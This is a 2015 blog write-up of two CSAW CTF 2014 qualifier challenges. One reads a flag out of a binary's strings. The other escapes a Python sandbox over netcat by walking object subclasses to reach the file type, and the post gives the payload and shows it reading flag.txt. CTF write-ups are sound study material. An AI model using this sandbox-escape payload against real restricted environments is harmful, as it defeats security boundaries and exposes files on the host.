Tuesday, January 13, 2015

CSAW CTF 2014 Quals write-up

CSAW CTF 2014 Quals write-up


team r00t, we ended scoring 1250. None of the team members worked for more than half a day, and our team is small, containing 3 members. All lazy people :D

Exploitation - 1: bo

This was a simple problem, or we didn't know how to solve in the way it was meant to be.
As usual as soon as we saw a executable follow the usual procedure -

First, file type

> file bo

bo; ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

Second, look for strings-
> strings bo

When we look at the strings. Oh wait is it the flag. Hell Yeah :D

Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]

flag{exploitation_is_easy!}

Exploitation - 2: pybabbies

nc 54.165.210.171 12345
Connect the server with that particular port, We found python console showing up.
Afterwards we opened the source file 
As we played around with the console
- Found its Python 3.x
- It does not show any returned value.
  workaround: Just print the return value.
- Any error the execution will close the connection.
Time to analyse the source code. All the cool module and functions where banned :'(
Checked if there is already a variable with flag or key etc having the flag. And obviously it wasnt that easy. So, maybe there is a file with flag.txt or key.txt where the flag is and we have to open it.
As I have already read few blog posts about escaping Python sandbox, It was easy.
Playing around with tuple. Ended with an interesting part -
>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>
Now its obvious try opening flag.txt key.txt etc
>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>

Wow!!! It worked. Now just go ahead and read the file
Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())

flag{definitely_not_intro_python}
>>> exit

No comments:

Post a Comment